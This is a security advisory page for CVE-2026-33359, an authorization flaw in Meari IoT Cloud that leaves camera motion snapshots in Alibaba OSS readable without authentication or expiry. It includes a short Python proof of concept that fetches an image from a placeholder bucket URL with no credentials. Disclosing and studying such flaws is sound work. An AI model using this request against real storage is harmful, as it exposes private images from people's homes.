Security Vulnerability Report
CVE-2026-33359 CVSS 7.5 HIGH

CVE-2026-33359

Published: 2026-05-11 17:16:31
Last Modified: 2026-05-11 17:16:31
Source: 44488dab-36db-4358-99f9-bc116477f914

Description

In Meari IoT Cloud alert image storage on Alibaba OSS (latest observed; storage service version not disclosed), motion snapshots are retrievable without authentication, signed URLs, or expiry enforcement. URLs function as direct object references and remain valid beyond expected operational windows.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Meari IoT Cloud (latest observed version; specific version number not disclosed)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2026-33359
# This script demonstrates how an unauthenticated user can access snapshot images.

# Example URL structure based on the vulnerability description (placeholder bucket/object)
target_url = "http://vulnerable-oss-bucket.oss-region.aliyuncs.com/alert_images/snapshot_timestamp.jpg"

try:
    # Send request without authentication headers or tokens
    response = requests.get(target_url, timeout=10)
    if response.status_code == 200:
        print("[+] Vulnerability Confirmed!")
        print(f"[+] Image retrieved successfully. Size: {len(response.content)} bytes")
        print(f"[+] Content-Type: {response.headers.get('Content-Type')}")
    else:
        print(f"[-] Access denied or not found. Status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error occurred: {e}")
```

References

- https://github.com/xn0tsa/nobody-puts-baby-in-a-corner
- https://www.runzero.com/advisories/meari-unauthenticated-alert-image-access-in-cloud-object-storage-cve-2026-33359/

Weakness: CWE-862 (Missing Authorization)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-33359", "sourceIdentifier": "44488dab-36db-4358-99f9-bc116477f914", "published": "2026-05-11T17:16:30.843", "lastModified": "2026-05-11T17:16:30.843", "vulnStatus": "Received", "cveTags": [{"sourceIdentifier": "44488dab-36db-4358-99f9-bc116477f914", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "In Meari IoT Cloud alert image storage on Alibaba OSS (latest observed; storage service version not disclosed), motion snapshots are retrievable without authentication, signed URLs, or expiry enforcement. URLs function as direct object references and remain valid beyond expected operational windows."}], "metrics": {"cvssMetricV31": [{"source": "44488dab-36db-4358-99f9-bc116477f914", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "44488dab-36db-4358-99f9-bc116477f914", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/xn0tsa/nobody-puts-baby-in-a-corner", "source": "44488dab-36db-4358-99f9-bc116477f914"}, {"url": "https://www.runzero.com/advisories/meari-unauthenticated-alert-image-access-in-cloud-object-storage-cve-2026-33359/", "source": "44488dab-36db-4358-99f9-bc116477f914"}]}}
```